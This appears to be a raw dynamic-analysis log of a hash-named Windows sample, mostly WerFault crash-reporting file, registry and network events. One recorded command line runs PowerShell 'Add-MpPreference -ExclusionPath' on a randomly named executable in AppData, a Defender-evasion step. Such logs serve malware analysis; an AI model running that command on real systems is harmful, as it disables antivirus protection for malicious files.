09:33:18:788,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.xml.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:788,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.xml.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:866,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	PROC_exec,	C:\Windows\SysWOW64\WerFault.exe,	target_pid:8148 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 8816 -s 1508' ,	0x00000000 [操作成功完成。  ],	
09:33:18:866,	WerFault.exe,	8148:0,	2928,	EXEC_create,	C:\Windows\SysWOW64\WerFault.exe,	parent_pid:8816 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 8816 -s 1508' image_base:0x0000000000EF0000 image_size:0x0006F000 ,	0x00000000 [操作成功完成。  ],	
09:33:18:913,	WerFault.exe,	8148:8152,	2928,	REG_rmval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\AmiOverridePath,	keyname:'HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\AppCompatFlags' ,	0x00000000 [操作成功完成。  ],	
09:33:19:100,	WerFault.exe,	8148:8152,	2928,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp,	access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:33:19:100,	WerFault.exe,	8148:8152,	2928,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp,	,	0x00000000 [操作成功完成。  ],	
09:33:19:100,	WerFault.exe,	8148:8152,	2928,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp.dmp,	access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:33:19:100,	WerFault.exe,	8148:8152,	2928,	FILE_truncate,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp.dmp,	eof:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:19:350,	WerFault.exe,	8148:8152,	2928,	FILE_write,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp.dmp,	offset:0x00000000 datalen:0x00000020 ,	0x00000000 [操作成功完成。  ],	
09:33:19:382,	WerFault.exe,	8148:0,	2928,	FILE_modified,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp.dmp,	,	0x00000000 [操作成功完成。  ],	
09:33:19:382,	WerFault.exe,	8148:8152,	2928,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp,	access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:33:19:400,	WerFault.exe,	8148:8152,	2928,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp,	,	0x00000000 [操作成功完成。  ],	
09:33:19:400,	WerFault.exe,	8148:8152,	2928,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp.WERInternalMetadata.xml,	access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000001 disposition:0x00000002 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:33:19:400,	WerFault.exe,	8148:8152,	2928,	FILE_write,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp.WERInternalMetadata.xml,	offset:0x00000000 datalen:0x00000002 ,	0x00000000 [操作成功完成。  ],	
09:33:19:400,	WerFault.exe,	8148:0,	2928,	EXEC_module_load,	C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51\comctl32.dll,	base:0x00000000742C0000 size:0x0020F000 ,	0x00000000 [操作成功完成。  ],	
09:33:19:400,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\Windows\SysWOW64\drivers,	filter:'*.mrk' ,	0x00000000 [操作成功完成。  ],	
09:33:19:400,	WerFault.exe,	8148:0,	2928,	FILE_modified,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp.WERInternalMetadata.xml,	,	0x00000000 [操作成功完成。  ],	
09:33:19:413,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:19:413,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:19:413,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:19:413,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:19:431,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\Windows\SysWOW64\drivers,	filter:'*.mrk' ,	0x00000000 [操作成功完成。  ],	
09:33:19:431,	WerFault.exe,	8148:8152,	2928,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp,	access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:33:19:431,	WerFault.exe,	8148:8152,	2928,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp,	,	0x00000000 [操作成功完成。  ],	
09:33:19:431,	WerFault.exe,	8148:8152,	2928,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp.xml,	access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:33:19:444,	WerFault.exe,	8148:8152,	2928,	FILE_write,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp.xml,	offset:0x00000000 datalen:0x00001323 ,	0x00000000 [操作成功完成。  ],	
09:33:19:444,	WerFault.exe,	8148:0,	2928,	FILE_modified,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp.xml,	,	0x00000000 [操作成功完成。  ],	
09:33:19:526,	WerFault.exe,	8148:5004,	2928,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:19:526,	WerFault.exe,	8148:5004,	2928,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:19:526,	WerFault.exe,	8148:5004,	2928,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:19:526,	WerFault.exe,	8148:5004,	2928,	FILE_readdir,	C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:19:539,	WerFault.exe,	8148:984,	2928,	REG_mkkey,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData,	access:0x0002001B ,	0x00000000 [操作成功完成。  ],	
09:33:19:539,	WerFault.exe,	8148:984,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData\ClockTimeSeconds,	type:0x0000000B datalen:8 data:'DF 4A ED 64 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:19:539,	WerFault.exe,	8148:984,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData\TickCount,	type:0x0000000B datalen:8 data:'25 9E 03 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:19:804,	powershell.exe,	5080:7324,	2928,	FILE_truncate,	C:\Users\bonelee\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive,	eof:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:19:804,	powershell.exe,	5080:7324,	2928,	FILE_write,	C:\Users\bonelee\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive,	offset:0x00000000 datalen:0x00000040 ,	0x00000000 [操作成功完成。  ],	
09:33:19:804,	powershell.exe,	5080:0,	2928,	FILE_modified,	C:\Users\bonelee\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive,	,	0x00000000 [操作成功完成。  ],	
09:33:19:804,	powershell.exe,	5080:7324,	2928,	FILE_truncate,	C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log,	eof:0x00000000 ,	0x00000000 [操作成功完成。  ],	
09:33:19:804,	powershell.exe,	5080:7324,	2928,	FILE_write,	C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log,	offset:0x00000000 datalen:0x00000902 ,	0x00000000 [操作成功完成。  ],	
09:33:19:804,	powershell.exe,	5080:0,	2928,	FILE_modified,	C:\Users\bonelee\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log,	,	0x00000000 [操作成功完成。  ],	
09:33:19:820,	conhost.exe,	7172:0,	2928,	EXEC_destroy,	C:\Windows\System32\conhost.exe,	parent_pid:5080 cmdline:'\??\C:\Windows\system32\conhost.exe 0x4' ,	0x00000000 [操作成功完成。  ],	
09:33:19:820,	powershell.exe,	5080:0,	2928,	EXEC_destroy,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe,	parent_pid:2928 cmdline:'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe"' ,	0x00000000 [操作成功完成。  ],	
09:33:20:366,	WerFault.exe,	8148:984,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018000B6180B055,	type:0x00000003 datalen:346 data:'01 00 00 00 01 00 00 00 D0 8C 9D DF 01 15 D1 11 ' ,	0x00000000 [操作成功完成。  ],	
09:33:20:366,	WerFault.exe,	8148:984,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}\DeviceTicket,	type:0x00000003 datalen:2282 data:'01 00 00 00 01 00 00 00 D0 8C 9D DF 01 15 D1 11 ' ,	0x00000000 [操作成功完成。  ],	
09:33:20:366,	WerFault.exe,	8148:984,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}\DeviceId,	type:0x00000001 datalen:34 data:'30 30 31 38 30 30 30 42 36 31 38 30 42 30 35 35 ' ,	0x00000000 [操作成功完成。  ],	
09:33:20:366,	WerFault.exe,	8148:984,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363}\ApplicationFlags,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:20:382,	WerFault.exe,	8148:5004,	2928,	FILE_readdir,	C:\Windows\SysWOW64\drivers,	filter:'*.mrk' ,	0x00000000 [操作成功完成。  ],	
09:33:20:475,	WerFault.exe,	8148:8004,	2928,	NET_connect,	52.168.117.173:443,	protocol:(TCP)0 ,	0x00000000 [操作成功完成。  ],	
09:33:20:711,	WerFault.exe,	8148:0,	2928,	NET_send,	52.168.117.173:443,	protocol:(TCP)0 datalen:195 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:20:945,	WerFault.exe,	8148:0,	2928,	NET_recv,	52.168.117.173:443,	protocol:(TCP)0 datalen:4380 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:20:945,	WerFault.exe,	8148:0,	2928,	NET_recv,	52.168.117.173:443,	protocol:(TCP)0 datalen:104 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:20:945,	WerFault.exe,	8148:0,	2928,	NET_send,	52.168.117.173:443,	protocol:(TCP)0 datalen:158 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:21:179,	WerFault.exe,	8148:0,	2928,	NET_recv,	52.168.117.173:443,	protocol:(TCP)0 datalen:51 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:21:179,	WerFault.exe,	8148:8004,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList,	type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' ,	0x00000000 [操作成功完成。  ],	
09:33:21:179,	WerFault.exe,	8148:8004,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList,	type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' ,	0x00000000 [操作成功完成。  ],	
09:33:21:179,	WerFault.exe,	8148:8004,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList,	type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' ,	0x00000000 [操作成功完成。  ],	
09:33:21:179,	WerFault.exe,	8148:8004,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList,	type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' ,	0x00000000 [操作成功完成。  ],	
09:33:21:194,	WerFault.exe,	8148:0,	2928,	NET_send,	52.168.117.173:443,	protocol:(TCP)0 datalen:1112 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:21:194,	WerFault.exe,	8148:0,	2928,	NET_send,	52.168.117.173:443,	protocol:(TCP)0 datalen:4125 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:21:194,	WerFault.exe,	8148:0,	2928,	NET_send,	52.168.117.173:443,	protocol:(TCP)0 datalen:836 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:21:819,	WerFault.exe,	8148:0,	2928,	NET_recv,	52.168.117.173:443,	protocol:(TCP)0 datalen:956 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:21:819,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive,	filter:'*_*_*_*_*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_484cb55c9a21365077a1c68a7b9e5e3cb2ef7722_e228f3e3_215782e1,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_6aff93876c44371897d1e8f3858937fb52c494b2_e228f3e3_250f7b02,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_776da5ffe2586954ea640af31356f08d6f957_e228f3e3_086773fd,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_95f6d93027ad781764f63e817714e23f481bb_e228f3e3_06378ac1,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_c260964a7f98f65ed93360ecba442716ad992e76_e228f3e3_27d79233,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_d09b36efc1ab823262e4447d9e591ac48e5997_e228f3e3_11bb643e,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_f84eeb62496d5a853d8f5eb857cf87ded2dac7c2_e228f3e3_253b6bfe,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.SkypeA_145397beb22a18b8f2e1ca19a6432416ebb65d7_a1837349_189e5fec,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_877cc3bf84bfd74bbcaeb9ff7ebafc9d7431acc6_d0dcfc74_182671de,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_e77e25b240783efe1581bc847cca6cdb2bdbcfc_e5c57aa7_18266c31,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.YourPh_8877c8bde7fa9a9c5de09dc7b9181a7eabfe680_3a1a0f1d_0c365e66,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_OneDrive.exe_79a15a9e6a5728ac489be495d0f32616b2ecd7_be72a7c1_09779752,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_ppPay.exe_6855cd3ec81df2b918bbf4c88c2d3bd08fcf8013_9b390eac_193e9ef5,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_ppPay.exe_6855cd3ec81df2b918bbf4c88c2d3bd08fcf8013_9b390eac_1f11520f,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_ppPay.exe_6855cd3ec81df2b918bbf4c88c2d3bd08fcf8013_9b390eac_205ea9bf,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Procmon64.exe_c09532f9985b38eb8e45674be1656687cd9197_ed45741f_1b84066a,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\Critical_10.0.19041.3025__478811c0481f9875deb83cbacc375e7afbeb849_00000000_0a03c628,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\Critical_10.0.19041.3266_e0c719d0ed7ee1aea59de04a38aa654a7c8435_00000000_12cc76cc,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\Critical_10.0.19041.3266__7c8945cffcc7f3887b6b9b7e1e5517ab5968fd6f_00000000_04d90897,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\Critical_10.0.19041.3266__7c8945cffcc7f3887b6b9b7e1e5517ab5968fd6f_00000000_0e873073,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_6_1cecfbec1fce2338d92f0fbce2327564f692bca_00000000_17b3b1ba,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_6_79fea5be87178577dda92ecb6203330c7841a6a_00000000_121cb425,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_6_c4a938beb533dfcfe565ac4db8c3e59c073d44a_00000000_0278268c,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_MicrosoftEdgeUpd_4df8dce2697bd23aa5ebc0def77646d714659a7c_00000000_18254686,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_MicrosoftEdgeUpd_7b16be7bdf552bdc43e24804272db49eab32bbd_00000000_1f4a525c,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_0976b8b2,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_09779212,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_09779bf5,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_0ccecc6a,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_0ebde483,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_5ce18cd333b17d7efe352dd3cadef2bdfe439ff_00000000_224e23fe,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_635d72ba1e42ee980484185cb023e6401bfae3_00000000_0b4486c8,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_635d72ba1e42ee980484185cb023e6401bfae3_00000000_0f6784fe,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_Update;_e85b952bb8dc9585c0b96537f30aec9168cfba_00000000_0f6780b8,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_readdir,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\NonCritical_X_c07298f5c3918c4755303fd2741546b048d9a67c_00000000_13937c31,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_99b2648789b255b8_c978aab1ee41caf4dacf67bec3f758f42aa96f_5344b36a_1fd7a70f,	access:0x00100001 alloc_size:0 attrib:0x00000080 share_access:0x00000003 disposition:0x00000002 options:0x00200021 ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_touch,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_99b2648789b255b8_c978aab1ee41caf4dacf67bec3f758f42aa96f_5344b36a_1fd7a70f\Report.wer,	access:0x00120196 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000005 options:0x00000060 ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_chmod,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_99b2648789b255b8_c978aab1ee41caf4dacf67bec3f758f42aa96f_5344b36a_1fd7a70f\Report.wer,	attrib:0x00002080 ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_write,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_99b2648789b255b8_c978aab1ee41caf4dacf67bec3f758f42aa96f_5344b36a_1fd7a70f\Report.wer,	offset:0x00000000 datalen:0x00000002 ,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:0,	2928,	FILE_modified,	C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_99b2648789b255b8_c978aab1ee41caf4dacf67bec3f758f42aa96f_5344b36a_1fd7a70f\Report.wer,	,	0x00000000 [操作成功完成。  ],	
09:33:21:835,	WerFault.exe,	8148:8152,	2928,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp.dmp,	,	0x00000000 [操作成功完成。  ],	
09:33:21:850,	WerFault.exe,	8148:8152,	2928,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D7A.tmp.WERInternalMetadata.xml,	,	0x00000000 [操作成功完成。  ],	
09:33:21:850,	WerFault.exe,	8148:8152,	2928,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DBA.tmp.xml,	,	0x00000000 [操作成功完成。  ],	
09:33:21:850,	WerFault.exe,	8148:8152,	2928,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DB8.tmp.csv,	,	0x00000000 [操作成功完成。  ],	
09:33:21:850,	WerFault.exe,	8148:8152,	2928,	FILE_remove,	C:\ProgramData\Microsoft\Windows\WER\Temp\WER9DC9.tmp.txt,	,	0x00000000 [操作成功完成。  ],	
09:33:21:850,	WerFault.exe,	8148:0,	2928,	EXEC_destroy,	C:\Windows\SysWOW64\WerFault.exe,	parent_pid:8816 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 8816 -s 1508' ,	0x00000000 [操作成功完成。  ],	
